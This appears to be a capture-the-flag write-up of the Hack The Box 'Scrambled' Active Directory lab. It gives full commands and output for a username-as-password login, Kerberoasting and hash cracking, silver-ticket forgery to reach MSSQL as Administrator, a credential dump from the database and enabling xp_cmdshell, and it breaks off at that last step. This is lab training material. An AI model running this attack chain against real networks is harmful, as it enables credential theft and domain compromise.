Scrambled-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: gathering and analysing information from the website, username-as-password, Kerberoasting, smbclient login in a domain environment, generating an MD4 (NT) password hash, obtaining the domain SID, forging a silver ticket, logging into the MSSQL database with a ticket, using the xp_cmdshell procedure, using the runas command, exploiting the deserialization vulnerability in the service on port 4411

Reference link: https://b0ysie7e.gitbook.io/articulos/write-up/hackthebox/2024-03-15-scrambled#silver-ticket-attack

Reference link: https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html

0x01 Obtaining user privileges

1. Official description of the box:

Scrambled is a medium-difficulty Windows Active Directory machine. By enumerating the website hosted on the remote machine, a potential attacker can deduce the credentials of the user "ksimpson". The website also states that NTLM authentication is disabled, which means Kerberos authentication must be used. Accessing the "Public" share with ksimpson's credentials reveals a PDF stating that an attacker retrieved credentials from the SQL database, which indicates that a SQL service is running on the remote machine. Enumerating normal user accounts shows that the "SqlSvc" account has a "Service Principal Name" (SPN) associated with it. An attacker can use this to perform an attack known as "Kerberoasting" and obtain the hash of "SqlSvc". After cracking the hash and obtaining the credentials of the "SqlSvc" account, the attacker can perform a "Silver Ticket" attack to forge a ticket and impersonate the user "Administrator" on the remote MSSQL service. Enumerating the database reveals credentials for the user "MiscSvc", which can be used to execute code on the remote machine through PowerShell remoting. System enumeration as the new user reveals a ".NET" application listening on port "4411". Reverse engineering the application shows that it uses the insecure "BinaryFormatter" class to transfer data, allowing an attacker to upload their own payload and execute code as "ntauthority\system".

2. Get the target IP address: 10.10.11.168

3. Scan the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.168 -oG allports
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:14 CST
Nmap scan report for 10.10.11.168
Host is up (0.34s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4411/tcp open found
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49728/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 48.92 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728,
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728 -sC -sV --min-rate=10.10.11.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:15 CST
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.13 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p53,80,88,135,139,389,445,593,636,1433,3268,3269,4411,5985,9389,49667,49673,49674,49728 -sC -sV --min-rate=10000 10.10.11.168
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 06:16 CST
Nmap scan report for 10.10.11.168
Host is up (0.13s latency).

Bug in ms-sql-ntlm-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-04-07 14:12:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m54s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after: 2025-04-07T13:59:53
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m53s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after: 2025-04-07T13:59:53
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.168:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-07T14:09:43
|_Not valid after: 2054-04-07T14:09:43
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m54s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after: 2025-04-07T13:59:53
|_ssl-date: 2024-04-07T14:16:30+00:00; -8h02m54s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-07T14:16:31+00:00; -8h02m53s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC1.scrm.local
| Not valid before: 2024-04-07T13:59:53
|_Not valid after: 2025-04-07T13:59:53
4411/tcp open found?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49728/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4411-TCP:V=7.94SVN%I=7%D=4/8%Time=66131B2A%P=aarch64-unknown-linux-
SF:gnu%r(NULL,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GenericLines,1D,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(GetRequest,35,"SCRAMBLECORP_ORDERS
SF:_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(HTTPOptions,35,"SCRAMBLECO
SF:RP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RTSPRequest,35,"S
SF:CRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r(RPCCheck
SF:,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSVersionBindReqTCP,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(DNSStatusRequestTCP,1D,"SCRAMBLECORP
SF:_ORDERS_V1\.0\.3;\r\n")%r(Help,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERR
SF:OR_UNKNOWN_COMMAND;\r\n")%r(SSLSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0
SF:\.3;\r\n")%r(TerminalServerCookie,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n
SF:")%r(TLSSessionReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(Kerberos,1
SF:D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SMBProgNeg,1D,"SCRAMBLECORP_OR
SF:DERS_V1\.0\.3;\r\n")%r(X11Probe,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")
SF:%r(FourOhFourRequest,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN
SF:_COMMAND;\r\n")%r(LPDString,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_
SF:UNKNOWN_COMMAND;\r\n")%r(LDAPSearchReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3
SF:;\r\n")%r(LDAPBindReq,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(SIPOpti
SF:ons,35,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\nERROR_UNKNOWN_COMMAND;\r\n")%r
SF:(LANDesk-RC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(TerminalServer,1D
SF:,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(NCP,1D,"SCRAMBLECORP_ORDERS_V1\
SF:.0\.3;\r\n")%r(NotesRPC,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(JavaR
SF:MI,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(WMSRequest,1D,"SCRAMBLECOR
SF:P_ORDERS_V1\.0\.3;\r\n")%r(oracle-tns,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;
SF:\r\n")%r(ms-sql-s,1D,"SCRAMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(afp,1D,"SCR
SF:AMBLECORP_ORDERS_V1\.0\.3;\r\n")%r(giop,1D,"SCRAMBLECORP_ORDERS_V1\.0\.
SF:3;\r\n");
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-04-07T14:15:47
|_ start_date: N/A
|_clock-skew: mean: -8h02m54s, deviation: 1s, median: -8h02m54s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 202.76 seconds

4. Bind the hostnames discovered by the port scan to the local hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.168 DC1.scrm.local scrm.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.168 DC1.scrm.local scrm.local

5. Let's look at what the service on port 80 serves

http://10.10.11.168/index.html

http://10.10.11.168/support.html

4 September 2021: Due to the security breach last month, we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use, so please bear with us while we work to resolve any issues.

6. Going by the notice above, NTLM authentication is disabled on this system. That means domain authentication has to go through hostnames; authenticating against the IP address inside the domain will not work. Let's look at the next page.

http://10.10.11.168/supportrequest.html

Please send your email to support@scramblecorp.com and we will get back to you as soon as possible.

7. In fact, the screenshot above also gives away a username

ksimpson

8. My first thought here was an AS-REP roasting attack, but the attempt failed

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.168 scrm.local/ksimpson -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for ksimpson
[-] User ksimpson doesn't have UF_DONT_REQUIRE_PREAUTH set

9. Keep going through the website and digging for information

http://10.10.11.168/passwords.html

Our self-service password reset system will be up and running soon, but in the meantime please call the IT support hotline and we will reset your password. If nobody is available, please leave a message stating your username and we will reset your password to be the same as your username.

http://10.10.11.168/salesorders.html

10. Given the hint above, does this mean the username is also the password? Let's try it with smbclient

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-smbclient -k scrm.local/ksimpson:ksimpson@DC1.scrm.local -dc-ip 10.10.11.168
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
Type help for list of commands
# share
*** Unknown syntax: share
# shares
ADMIN$
C$
HR
IPC$
IT
NETLOGON
Public
Sales
SYSVOL
# use Public
# ls
drw-rw-rw- 0 Fri Nov 5 06:23:19 2021 .
drw-rw-rw- 0 Fri Nov 5 06:23:19 2021 ..
-rw-rw-rw- 630106 Sat Nov 6 01:45:07 2021 Network Security Changes.pdf
# get 'Network Security Changes.pdf'
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
# get Network Security Changes.pdf
#

11. A PDF file was downloaded here; let's read it

file:///home/kali/Desktop/Network%20Security%20Changes.pdf

As you may have heard, our network was recently compromised and the attackers were able to access all of our data. We have identified how the attackers gained access and have immediately made some changes. You can find these listed below, together with how the changes may affect you.
Change: Because the attackers used what is known as "NTLM relay", we have disabled NTLM authentication across the whole network.
Affected users: All
Workaround: When you log in or access network resources, Kerberos authentication will now be used (which is absolutely 100% secure and definitely cannot be exploited by anyone). This requires you to use the full domain name (scrm.local) with your username and with the name of any server you access.
Change: The attackers were able to retrieve credentials from the SQL database used by our HR software, so we have removed all access to the SQL service for everyone except network administrators.
Affected users: HR department
Workaround: If you can no longer access the HR software, contact us and we will manually re-grant access for your account.

12. Seeing this, another thought: now that we have a domain account and password, can we try a Kerberoasting attack?

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-GetUserSPNs scrm.local/ksimpson:ksimpson -k -dc-host 'dc1.scrm.local' -request
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-04 00:32:02.351452 2024-04-07 22:09:41.785250
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-04 00:32:02.351452 2024-04-07 22:09:41.785250



[-] CCache file is not found. Skipping...
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3d7b8500d43ce6a2016a85c70a244e93$4d7c0b0789f88ca5c5ee876f66b3d55bc7dabe1f7fa515bed48cb126310338ed8be9a88b82491700bf8ff6bf712f102765d764647b837e6df52634026190e8b01e3e85f1ccf061cbb01c8c4e7d0d8c2f9f66599f0b8a5b1053fb4829649afdb4fa350c77aca8883fcad4724f3fa4ab81e691785033909e6c801eb6e89085f082d5b58a00da0e616508a0e8d5ae8c9c2a70f627d5022259c2657dbef235005d35af39de038e243dc7592e02129b0bb5a9c4e00cdbe7a544432c6e3b4412490dd7c369b95463298d9c4a285534b330c2b3ed97c1900919ee15211abdf393dfe711d2e17c55f9d3a1440f925d2767ae018eab09fc3a5868f6f0e3961e842b0c936f63952420093a6159f7d9615e9bbb7c9c7e0ecbe0965a57566dd8f8b8b3c9072e82349a06c454173023b40e97da0a8c7a0028d74f04da39718315c8926d5d3a6b811fbff722535a4371bbee41fde92fb1c6de56cef80f564271de391b83b74e40bddea0df139dda098c33b06a61eecc30d4dc63ce646063a808d66518a3de0b48aa32226421f10c9f3b40f39d351aca6d7c2e3ba44ab06c481bd5d7c0daf938ebb9021f680f5cca3d4ea3bf7863fb2826c34478ad2b61ea06ad20b0d41bfb2e8704f7f4f096682ff81eade3946713aa7efb5bb4ee10c7c32260273cc303fe2762b0184e7700397429a3d31306ae0e0ae41cba0b4ba7f71d4709c76c201ca834907715b0d8f3ab912f0b1d07fefb855a813e8dcfcd1a1cc0acd202bde5870b3a6ec1a00eba72751b303e98d69b3b16ea9ef5d10360dee607929638354ad6f55629e1fdb0c2b8cbe25f6593167394cba07dc74908ff0d2f97440c9ddbf37b1b268564902565ababda7c744930823c2d9a1a5c160c0780ac576dbb1a1255b7e0d23c8bcf2a79a14c079a500c2189383869eabc0949655794cacfcf8883dc85b0f7f1d6151ac87992baad4d385fbfbe354ede517aad09c47ac6fdbfce58b956431ea1c05b9746f3d9fd5b350eec783f674b6efc353630b97d8a5163ac585d6a6e9db5b54d21ecfce69001d73311b93053517f9138f677de38622b6a7f66c872fa6f13b50642de58d42c389513c45400d30eaebfaba10c5e08671a27d0a3c9f90b605878123aeff86cc2b54ca69e5a1d62d781c9114cc05882ba1e500af7b8cdc5ad3a4b9fcae541d8d07972175efd4b6976afe803b50f946bf0390ec27b949fb9f1efa0b5b7eb1002b2f61a38c799bf6cd699059363ccd5418a61b822891795802b6784cb74019c0ef2a29c675a31ab83980fbeec832134c645d513dbc16745503b18d937f4f61336bb593157588620b360ad02bf731fee1a55deaa518d11012b7
f6553ede19dad9e5deca07b7232bedc10073157fedad4a2a24d72b570177b87fe14db77fec67156f05682dc381d1457db2d4c7d39fecbe7e532fad3ff

13. Let's try cracking the password

┌──(kali㉿offsec)-[~/Desktop]
└─$ hashcat -h | grep -i "kerberos"
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocol
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocol
28800 | Kerberos 5, etype 17, DB | Network Protocol
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocol
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocol
28900 | Kerberos 5, etype 18, DB | Network Protocol
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocol
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码:
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3d7b8500d43ce6a2016a85c70a244e93$4d7c0b0789f88ca5c5ee876f66b3d55bc7dabe1f7fa515bed48cb126310338ed8be9a88b82491700bf8ff6bf712f102765d764647b837e6df52634026190e8b01e3e85f1ccf061cbb01c8c4e7d0d8c2f9f66599f0b8a5b1053fb4829649afdb4fa350c77aca8883fcad4724f3fa4ab81e691785033909e6c801eb6e89085f082d5b58a00da0e616508a0e8d5ae8c9c2a70f627d5022259c2657dbef235005d35af39de038e243dc7592e02129b0bb5a9c4e00cdbe7a544432c6e3b4412490dd7c369b95463298d9c4a285534b330c2b3ed97c1900919ee15211abdf393dfe711d2e17c55f9d3a1440f925d2767ae018eab09fc3a5868f6f0e3961e842b0c936f63952420093a6159f7d9615e9bbb7c9c7e0ecbe0965a57566dd8f8b8b3c9072e82349a06c454173023b40e97da0a8c7a0028d74f04da39718315c8926d5d3a6b811fbff722535a4371bbee41fde92fb1c6de56cef80f564271de391b83b74e40bddea0df139dda098c33b06a61eecc30d4dc63ce646063a808d66518a3de0b48aa32226421f10c9f3b40f39d351aca6d7c2e3ba44ab06c481bd5d7c0daf938ebb9021f680f5cca3d4ea3bf7863fb2826c34478ad2b61ea06ad20b0d41bfb2e8704f7f4f096682ff81eade3946713aa7efb5bb4ee10c7c32260273cc303fe2762b0184e7700397429a3d31306ae0e0ae41cba0b4ba7f71d4709c76c201ca834907715b0d8f3ab912f0b1d07fefb855a813e8dcfcd1a1cc0acd202bde5870b3a6ec1a00eba72751b303e98d69b3b16ea9ef5d10360dee607929638354ad6f55629e1fdb0c2b8cbe25f6593167394cba07dc74908ff0d2f97440c9ddbf37b1b268564902565ababda7c744930823c2d9a1a5c160c0780ac576dbb1a1255b7e0d23c8bcf2a79a14c079a500c2189383869eabc0949655794cacfcf8883dc85b0f7f1d6151ac87992baad4d385fbfbe354ede517aad09c47ac6fdbfce58b956431ea1c05b9746f3d9fd5b350eec783f674b6efc353630b97d8a5163ac585d6a6e9db5b54d21ecfce69001d73311b93053517f9138f677de38622b6a7f66c872fa6f13b50642de58d42c389513c45400d30eaebfaba10c5e08671a27d0a3c9f90b605878123aeff86cc2b54ca69e5a1d62d781c9114cc05882ba1e500af7b8cdc5ad3a4b9fcae541d8d07972175efd4b6976afe803b50f946bf0390ec27b949fb9f1efa0b5b7eb1002b2f61a38c799bf6cd699059363ccd5418a61b822891795802b6784cb74019c0ef2a29c675a31ab83980fbeec832134c645d513dbc16745503b18d937f4f61336bb593157588620b360ad02bf731fee1a55deaa518d11012b7
f6553ede19dad9e5deca07b7232bedc10073157fedad4a2a24d72b570177b87fe14db77fec67156f05682dc381d1457db2d4c7d39fecbe7e532fad3ff:Pegasus60

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3...fad3ff
Time.Started.....: Sun Apr 7 23:40:25 2024 (7 secs)
Time.Estimated...: Sun Apr 7 23:40:32 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1699.4 kH/s (0.45ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10729472/14344385 (74.80%)
Rejected.........: 0/10729472 (0.00%)
Restore.Point....: 10728448/14344385 (74.79%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: People2People -> Pearson1
Hardware.Mon.#1..: Util: 79%

Started: Sun Apr 7 23:40:25 2024
Stopped: Sun Apr 7 23:40:33 2024

sqlsvc
Pegasus60

14. The username and password obtained here, together with the information in the PDF, suggest that the next step is to get at the data in SQL. Access has to be by ticket, and right now the only route is a silver ticket, since the account we obtained is most likely the service account.

15. A silver ticket is built from three key pieces of information: the service account's hash, the domain SID, and the service principal name. First, generate the service account hash

┌──(kali㉿offsec)-[~/Desktop]
└─$ iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05

16. Get the domain SID with impacket-getPac

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-getPac scrm.local/sqlsvc:Pegasus60 -targetUser administrator
Impacket v0.11.0 - Copyright 2023 Fortra

KERB_VALIDATION_INFO
LogonTime:
dwLowDateTime: 867386488
dwHighDateTime: 31099125
LogoffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
KickOffTime:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
PasswordLastSet:
dwLowDateTime: 2585823167
dwHighDateTime: 30921784
PasswordCanChange:
dwLowDateTime: 3297396671
dwHighDateTime: 30921985
PasswordMustChange:
dwLowDateTime: 4294967295
dwHighDateTime: 2147483647
EffectiveName: 'administrator'
FullName: ''
LogonScript: ''
ProfilePath: ''
HomeDirectory: ''
HomeDirectoryDrive: ''
LogonCount: 256
BadPasswordCount: 0
UserId: 500
PrimaryGroupId: 513
GroupCount: 5
GroupIds:
[

RelativeId: 513
Attributes: 7 ,

RelativeId: 512
Attributes: 7 ,

RelativeId: 520
Attributes: 7 ,

RelativeId: 518
Attributes: 7 ,

RelativeId: 519
Attributes: 7 ,
]
UserFlags: 544
UserSessionKey:
Data: b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
LogonServer: 'DC1'
LogonDomainName: 'SCRM'
LogonDomainId:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
LMKey: b'\x00\x00\x00\x00\x00\x00\x00\x00'
UserAccountControl: 16912
SubAuthStatus: 0
LastSuccessfulILogon:
dwLowDateTime: 0
dwHighDateTime: 0
LastFailedILogon:
dwLowDateTime: 0
dwHighDateTime: 0
FailedILogonCount: 0
Reserved3: 0
SidCount: 1
ExtraSids:
[

Sid:
Revision: 1
SubAuthorityCount: 1
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x12'
SubAuthority:
[
2,
]
Attributes: 7 ,
]
ResourceGroupDomainSid:
Revision: 1
SubAuthorityCount: 4
IdentifierAuthority: b'\x00\x00\x00\x00\x00\x05'
SubAuthority:
[
21,
2743207045,
1827831105,
2542523200,
]
ResourceGroupCount: 1
ResourceGroupIds:
[

RelativeId: 572
Attributes: 536870919 ,
]
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

0000 10 00 00 00 89 20 BF 29 25 D0 28 2D F6 C2 35 24 ..... .)%.(-..5$

17. At this point we have all three key pieces of information; the service principal name is a fixed value, taken from the SPN listed earlier

b999a16500b87d17ec7f2e2a68778f05

S-1-5-21-2743207045-1827831105-2542523200

MSSQLSvc/dc1.scrm.local

18. Forge the silver ticket

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -user-id 500 Administrator -spn MSSQLSvc/dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

19. Import the ticket locally and use it to log into the MSSQL database

┌──(kali㉿offsec)-[~/Desktop]
└─$ KRB5CCNAME=Administrator.ccache impacket-mssqlclient -k dc1.scrm.local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>

20. Now browse through the database

SQL (SCRM\administrator  dbo@master)> select name, database_id from sys.databases;
name database_id
---------- -----------
master 1

tempdb 2

model 3

msdb 4

ScrambleHR 5

SQL (SCRM\administrator dbo@master)> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
----------
Employees

UserImport

Timesheets

SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0

SQL (SCRM\administrator dbo@master)>

21. Nothing special turned up beyond one user's account and password, so on to the usual MSSQL command execution through the xp_cmdshell procedure

SQL (SCRM\administrator  dbo@master)> SELECT is_srvrolemember('sysadmin');

-
1

SQL (SCRM\administrator dbo@master)> EXEC xp_cmdshell 'net user';
[-] ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator dbo@master)> EXEC sp_configure 'show advanced options', 1;
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE;
SQL (SCRM\administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1;
